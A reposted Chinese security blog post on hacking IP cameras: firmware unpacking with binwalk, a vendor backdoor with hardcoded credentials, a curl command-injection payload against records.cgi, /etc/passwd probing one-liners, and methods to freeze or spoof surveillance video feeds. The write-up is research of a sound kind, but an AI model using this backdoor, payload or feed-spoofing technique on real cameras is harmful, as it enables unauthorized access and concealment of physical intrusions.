原帖地址:http://drops.wooyun.org/papers/5157

0x00 IPCAM hacking


  • TOOLS
    github-binwalk
    firmware-mod-kit
    IDA
    ......

  • 主要分析流程
    通过binwalk分析识别固件文件
    分离提取固件
    把提取的elf载入到分析软件(IDA)
    开始分析研究吧~

binwalk和fmk学习


binwalk

binwalk xxx.bin

最简单的分析命令,通过签名匹配来识别固件中的文件,可是单单通过这样的简单匹配可能有其他的文件类型不能识别,所以有时可以使用插件--enable-plugin=***

可以从图中看出,0x32E8的便宜位置是gzip的压缩包文件,0x8A6A88的便宜位置是linux内核镜像的头部,可以看到他的一些信息

binwalk xxx.bin --dd=类型:保存下来的扩展名

这样,会把gzip的文件保存到本地以.gzip命名

也可以用binwalk自动化递归提取binwalk xxx.bin -eM

之后iou就可以通过解包等行为分析我们提取出来的文件了,不过,在一些简单的分析情况下,我们这样识别,分析,提取,过滤,解包,有些繁杂,此时就可以用fmk来帮我们很快的完成这些工作

p.s. 除了通过binwalk的内置函数进行提取,我们还可以通过dd命令来提取文件

dd if=xxx.bin bs=1 skip=[***] count=[***] of=outfilename

  • firmware-mod-kit

通过svn安装fmk,我们来认识一下这个套件用到的东西

extract-firmware.sh使用来解包固件

build-firmware.sh使用来重新封包

check_for_upgrade.sh用来检查更新

unsquashfs_all.sh使用来解包提取出来的squashfs文件

1

./extract-firmware.sh xxx.bin

可以很方便的帮我们提取文件

之后,我们可以在当前目录的fmk下找到提取出来的文件

logs目录下还给我们提供了binwalk的log

rootfs下就是固件解包提取的文件了

IPCAM hacking


网络摄像头hacking其实和其他嵌入式设备hacking类似,尤其和各种路由器的玩法相似,我们此处简要以一个运用非常广泛的网络摄像头为例,3s的摄像头,在分析中,我发现了其厂商自带的后门以及一个RCE,篇幅所限,第一篇笔记我们只提到后门(其实就是懒,不想码字...)

通过上述过程解包提取文件,在/home/3s/bin/ 下,找到了他的webservice-httpd,在/home/3s/www/ 下是他的源码

将httpd丢入IDA

很快看到有奇怪的东西乱入了...system.anonymousptz....why are u so diao

官方后门get,shodan上搜一搜发现在今年上半年已经有老外发过了,但是貌似这个后门至今3s公司依旧在其他的摄像头型号里使用...给跪

影响所有N10xx到N50xx型号的摄像头

0x02 function calls to the evil


我们通过ida分析N5071的webserver后发现了他至今使用的官方后门,已经可以通过后门未授权通过web访问IPCAM进行研(偷)究(窥)了,但是作为一名hacker,这还不够酷,在分析的过程中,我还发现了影响其N产品的一个远程命令执行,虽是第一次做binary分析,但是很有趣,仅以此文做学习嵌入式设备hacking的记录 :)

在N5071的代码中,有很多诸如sprintf strcpy的不安全函数调用,当我们配合之前提到的后门时,那影响就是一片一片的~

这个系列产品是可以支持管理本地文件存储的,在webserver中,有records.cgi控制

records.cgi使用来做删除操作,会先交由函数do_records检查是否存在文件

如果文件存在,那么就会抛给sprintf去做字符串格式化然后执行rm命令删除,如图:

那么,问题就来了,上学老师就告诉过,sprintf要不得,一点过滤都没有而且这里还是用的system function

(web狗表示这里能够搞定很开心~)

所以,我们可以利用官方那个后门访问records.cgi,构造payload来进行命令注入从而执行系统命令

1

curl -d "user=3sadmin&password=27988303" http://*.*.*.*/records.cgi?action=remove&storage=sd&filename=test`commands`

0x03 exploit


执行poweroff后~

0x04 IPCAM&&videorecorders


一直以来,hacking题材的电影都非常炫酷,黑客们入侵大楼在键盘上噼里啪啦,不多时就如入无人之境,分分钟黑下大楼的所有系统,其中,对监控摄像头的hacking描写也很多,这次我们就来“意淫”一下,入侵大楼时,hacking监控摄像(文中案例都是我编的,请勿对号入座)

一般大楼内都有许多摄像头,它们通常区分为网络摄像头和录像机,录像机是可以保存画面数据的,先来大致了解一下他们是如何工作的:

如上图,管理界面可以分屏查看当前在线的所有cam画面

从简易到拓扑我们可以看到,在整个系统中manage server用作管理下属cam,通常有web ui,管理还可通过自己的设备接入进行管理操作,管理的日志和数据存放在数据库中,说明是有数据查询交互的,DVR录像机的画面数据也会存放在server中,而ipcam则会实时传输,也就是说,我们hacking的入手点,可以放在DVR,IPCAM,manager的web方向

也就是说,我们可以通过:

web ui(manager server) -->HTTP(apache。。。) -->OS(system)-->Hardware(DVR&&IPCAM)OR

Hardware(DVR&&IPCAM) -->OS(system)-->HTTP(apache。。。) -->web ui(manager server)

一个是通过上层到底层,另一个则直接通过IPCAM或DVR的固件问题直接hacking

0x05 some tricks


上一篇文章中我们通过执行payload时使用curl发包,用ping来检测命令是否注入,在embedded devices hacking中,还有一些小trick可以帮助我们

很多时候,厂商对原始设备进行了二次开发,所以有些命令你在其他设备work,在目标设备就不work,所以我们可以多采用几种命令进行测试,如curl,wget,nc

灵活使用linux命令进行字符串操作

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

$ if test `sed -n '/^root/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;

fi

1

// 检测root,下面是一些更好的方式。

$ if test `sed -n '/^r/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;

fi

1

$ if test `sed -n '/^ro/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;

fi

1

$ if test `sed -n '/^roo/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;

fi

1

$ if test `sed -n '/^root/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;

fi

1

(学习自wooyun zone)

当遇到目标有限制字符时,可以写入shell脚本进行执行

如果你非常不幸,遇到了一个阉割命令的busybox多嵌入式设备,权限很高却无法执行命令,那么,你需要参考喔之前的一篇文章网络设备中限制用户命令交互的逃逸

ssh给我们提供了一个可以按照配置预期执行命令的功能,在$HOME/.ssh/ config中进行配置,我们可以达到这样的效果,我们在配置文件中预期执行添加一个新的root用户,UID为0且无限制执行命令,以此来逃逸网络设备的限制问题

0x06 你看到的不是真相


在电影里,我们除了看到黑客直接把大楼系统黑下,还经常看到篡改摄像头的画面,这是怎么做到的~DVR我没研究过,所以暂时不发表观点,在IPCAM,因为数据时以流的形式传送的,所以,如果我们把数据传输的流掐断,会怎样呢~

答案是管理在web ui上看到的,会冻结在掐断之前的画面,之后摄像头捕捉到到所有画面都不会实时传输回去,以此来达到篡改的目的

举个栗子,在Trendnet的一款摄像头中,通过fmk分离固件,我看到了一个叫做mjpg.cgi的文件,这个cgi程序起到的作用就是用来传输摄像头到web ui这个过程的,那么~

我只需要kill掉mjdp进程,整个画面就冻结在kill之前的画面了,在这个攻击中,我甚至都不用ssh连接后本地执行,因为我们可以配合之前所说道的攻击流程,直接对cam固件分析,通过类似RCE的方式kill~

有同学问到了一个问题,关于时间戳的事儿,这得分情况,如果是DVR的话,录像画面都是从存储设备中调取,所以要篡改,需要更换文件(因为美研究过DVR,这是我意淫的)

对于IPCAM,有部分不带时间戳,不用考虑这个问题,如果带的,也不用担心,因为他们处理画面传输和时间的进程时两个不同的,你kill了画面的而已(这涉及到他设备的功能实现问题,如果他二者都在一起,当我没说~)

但是~这并不是一个最好的hacking方法,因为这有一个弊端,如果管理员重新加载浏览管理页面时,进程又会重启,他又会得到实时的画面传输

那么,大招来了,我们是不是可以通过什么攻击方式来实时更改画面传输,或者说,我们是不是可以通过更好的hacking手段来进行实时欺骗,答案很明显~当然可以

我们可以通过一个很简单的shell脚本来替换进程传输的画面为你需要的一个静态图片来达到欺骗的目的,大概实现如下:

1

2

echo -ne “HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\n”

cat ztzsb.jpg

如何执行这个东西,就不用赘述了,你可以直接新建一个,也可以直接加入到cgi脚本中,让他自己来执行,如果有更棒的方法,求告知学习~在执行我们的脚本后,管理得到的画面将是你的欺骗画面

多说一句的是,我比较推荐的是备份原始cgi,用新的脚本来执行欺骗,这样有个好处是可以针对普遍情况的设备,避免二次开发或者不同设备对原始cgi的依赖问题,避免错误

0x07 我是如何劫持你的摄像头的


之前的几篇文章已经介绍了ipcam的几种玩法和案例

ipcam hacking_1

ipcam hacking_2

ipcam hacking_3

ipcam hacking_3中,我们还简单的介绍了一种劫持摄像头画面传输的hacking手法

那么,我们今天就来主要看看劫持ipcam的姿势

我们说过,如何对ipcam进行画面劫持,得弄明白这款摄像头实现画面传输的逻辑,我们大概可以对劫持准备进行这么几步:

  • 确定用于视频流传输的协议
  • 找到处理视频流的CGI
  • 分析脚本文件,找到脚本中的功能函数
  • 有些摄像头固件是没有动态脚本的,功能处理都写在server的bin中,所以还要分析server的bin文件
  • 你看到的不是真的,hack it!

很简单,一步一步来,相对于白盒,直接黑盒测试更方便判断协议和找到处理脚本,然后在针对的进行白盒分析

固件分离我们就不说了,可以参看我之前的几篇文章,我们在视频传输的功能页面进行抓包,得到这样的报文:

0x08 确定协议


1

2

3

4

5

6

7

8

9

10

11

12

13

14

GET /videostream.cgi HTTP/1.1

Host: 10.10.1.3

Connection: keep-alive

Authorization: Basic YWRtaW46

HTTP/1.1 200 OK

Server: Netwave IP Camera

Date: Thu, 01 Jan 1970 22:10:36 GMT

Accept-Ranges: bytes

Connection: close

Content-Type: multipart/x-mixed-replace;boundary=ipcamera

--ipcamera

Content-Type: image/jpeg

Content-Length: 17561

......JFIF..............Lavc54.27.100....Cztzztzztzztzztzztz

链接类型是multipart/x-mixed-replace,通过http协议来模拟画面的推送

就是说每次的画面传输都是ipcam使用的mjpeg流的传输,画面就是一张图一张图连贯起来形成的视频画面

0x09 找到处理视频的CGI


同样,在web界面中的画面监控的地方进行抓包,得到了整个传输过程的报文

从live.html --> cam.html --> videostream.cgi

通过使用fmk对固件分离,grep找到了videostream.cgi是写在handle_cgi_requests这个bin文件中的

通过鼠标滚轮大法,我发现除了videostream.cgi这个文件控制画面传输功能之外,还有videostream.asf,这在之前的黑盒测试中是无法发现的

所以我们一会儿分析的时候除了videostream.cgi还有videostream.asf

可能有朋友要问了,你不会顺着跟踪函数来分析功能么?为什么还傻乎乎的滚鼠标一个一个找? (QAQ因为我是web狗)

0x10 找到实现功能的函数


因为这个固件是将功能写入到bin文件中的,所以找到其实现的函数也是在bin中找(web狗压力好大。。。)

通过跟踪videostream.cgi和videostream.asf,可以找到这样一个函数

函数功能用于接收摄像头捕捉到的画面并且会返回一个相应的包头和jpg的数据

(接下来就是对这个bin文件的详细分析,web狗做的分析,肯定有很多不对,求各位斧正)

1

2

3

4

5

6

7

8

9

10

11

image_counter = 0;

image_data = malloc(size_of_image);

[r4, #4] = image_data;

sprintf(&image_data, "/home/my_picture_%d",

image_counter);

f = fopen(image_data, "rb");

fread(&image_data, 1, size_of_image, f);

fclose(f);

[R4, #0xC] = size_of_image;

image_counter ++;

image_counter = image_counter % number_of_images;

看得出来,每次画面的选取都是从/home/my_picture这里选取的,因为之前说过,整个画面传输的工作都是连续的图片传输,所以,如果我们可以对这里的文件进行批量的写操作,就能够对画面进行实时欺骗了呢

yep,但是对ipcam的画面劫持的前提是,你需要获得到这个摄像头的会话,并且有一定权限,对文件进行写操作

所以,整个过程,应该是这样:

  • 找到目标摄像头并确定其版本,型号,对固件进行下载分析
  • 利用之前该版本爆出过的漏洞或者自己对固件分析后得到的漏洞获取会话
  • 确定用于视频流传输的协议
  • 找到处理视频流的CGI
  • 分析脚本文件,找到脚本中的功能函数
  • 有些摄像头固件是没有动态脚本的,功能处理都写在server的bin中,所以还要分析server的bin文件
  • 你看到的不是真的,hack it!

0x11 something fun


在我对视频流劫持查找资料学习的时候,我找到了一个小玩意videojak

videojak是一个很简单的ipcam的安全测试工具,它可以在你获取到的ipcam中做一个类似MITM的中间人攻击,直接劫持整个画面的传输流,或者重放上一个传输流

挺好玩呢

还有一个针对2013年blackhat大会上,Craig Heffner大神的好莱坞hacking议题中提到的所有摄像头漏洞的直接利用工具,ipcamshell

ipcamshell可以帮助你直接获取一个交互式的会话,并且拿到这个摄像头的认证用户名和密码

0x12 结语


文章最后,感谢各位不喷我这班门弄斧的crack水平和bin分析,因为每款型号的摄像头的固件功能实现都不相同,所以文中的例子只是一个例子而已,主要是介绍一下整个分析思路和过程。

我也还在折腾学习摄像头方面的hacking,希望各位不吝赐教~

嵌入式设备hacking(转)的更多相关文章

  1. 嵌入式设备上的 Linux 系统开发

    转载:http://www.ibm.com/developerworks/cn/linux/embed/embdev/index.html   如果您刚接触嵌入式开发,那么大量可用的引导装载程序(bo ...

  2. 嵌入式设备web服务器比较

    目录(?)[-] Boa Thttpd Mini_httpd Shttpd Lighttpd Goahead AppWeb Apache 开发语言和开发工具 结论 备注   现在在嵌入式设备中所使用的 ...

  3. 嵌入式设备web服务器

    操作系统:ubuntu10.04 前言:    为了提高对设备的易操作性,很多设备中提供pc机直接通过浏览器操作设备的功能.这就需要在设备中实现web服务器.    现在在嵌入式设备中所使用的web服 ...

  4. Local Binary Convolutional Neural Networks ---卷积深度网络移植到嵌入式设备上?

    前言:今天他给大家带来一篇发表在CVPR 2017上的文章. 原文:LBCNN 原文代码:https://github.com/juefeix/lbcnn.torch 本文主要内容:把局部二值与卷积神 ...

  5. 在嵌入式设备中使用 JavaScript 的前景

    by Conmajia PC上的JavaScript已经发展到ECMAScript 6(ES6),马上ES10都快出来了(虽然还是草案),但是硬件上的JS却很少听说.这几年手持设备/可穿戴设备的发展非 ...

  6. 技巧:结合Zabbix与SNMP监控嵌入式设备

    在如何利用Zabbix监控网络设备三篇文章的前两篇中,我们介绍了如何通过Zabbix代理监控网络设备.但有些设备无法安装Zabbix代理,需要采用其他方法监控.需要考虑无法安装软件的嵌入式设备或应用程 ...

  7. 【ARM-Linux开发】ARM嵌入式设备Linux系统启动步骤和方式

    1). 简介 本文简单介绍ARM嵌入式设备基于嵌入式Linux操作系统时候的启动步骤和启动方式, 区别与X86平台,ARM平台下并没有一个标准的启动步骤,不同ARM SoC都会使用各自定义的boot ...

  8. 在嵌入式设备中实现webrtc的第三种方式①

    最近两年,我对于网络知识,包括底层协议学习比较多,webrtc这种几乎是使用到了所有层面网络协议的技术也逐渐进入我的视野. 之前我提出了两种在嵌入式设备上实现webrtc的方式,一是用官方代码,然后改 ...

  9. 嵌入式设备上卷积神经网络推理时memory的优化

    以前的神经网络几乎都是部署在云端(服务器上),设备端采集到数据通过网络发送给服务器做inference(推理),结果再通过网络返回给设备端.如今越来越多的神经网络部署在嵌入式设备端上,即inferen ...

随机推荐

  1. Android 浏览器启动应用程序

    点击浏览器中的URL链接,启动特定的App. 首先做成HTML的页面,页面内容格式如下: <a href="[scheme]://[host]/[path]?[query]" ...

  2. MFC中CString.Format类详解

    在MFC程序中,使用CString来处理字符串是一个很不错的选择.CString既可以处理Unicode标准的字符串,也可以处理ANSI标准的字符串.CString的Format方法给我们进行字符串的 ...

  3. thinkphp5与thinkphp3.X对比

    原文https://www.cnblogs.com/wupeiky/p/5850108.html 首先声明本章节并非是指导升级旧的项目到5.0,而是为了使用3.X版本的开发者更快的熟悉并上手这个全新的 ...

  4. Python SGMLParser 的1个BUG??

    首先说一下,我用的是python 2.7,刚好在学Python,今天想去爬点图片当壁纸,但是当我用 SGMLParser 做 <img> 标签解析的时候,发现我想要的那部分根本没获取到,我 ...

  5. JS格式化时间并比较

    JS格式化时间,然后进行比较.工作遇到的情况,然后网上找到的,记下来,下次用! </head> <body> <button onclick="myFuncti ...

  6. Temp权限导致Win10安装程序失败提示2502/2503错误

    有Win10用户在安装程序时遇到了安装失败错误代码2502/2503的问题.如图: 其原因是Windows Installer安装程序需要当前用户具有C:\Windows\Temp目录的完全控制权限, ...

  7. 转发:RocketMQ与kafka的对比

    淘宝内部的交易系统使用了淘宝自主研发的Notify消息中间件,使用Mysql作为消息存储媒介,可完全水平扩容,为了进一步降低成本,我们认为存储部分可以进一步优化,2011年初,Linkin开源了Kaf ...

  8. day1作业二:多级菜单操作

    作业二:多级菜单 (1)三级菜单 (2)可以次选择进入各子菜单 (3)所需新知识点:列表.字典 要求:输入back返回上一层,输入quit退出整个程序 思路: (1)首先定义好三级菜单字典: (2)提 ...

  9. C# 文件下载断点续传

    C# 文件下载断点续传的一个类 using System; using System.Collections.Generic; using System.Linq; using System.Text ...

  10. ASP.NET:MVC中文件上传与地址变化处理

    目录 文件的上传和路径处理必须解决下面列出的实际问题: 1.重复文件处理 2.单独文件上传 3.编辑器中文件上传 4.处理文章中的图片路径 5.处理上传地址的变化 一.上传文件和重复文件处理 文件处理 ...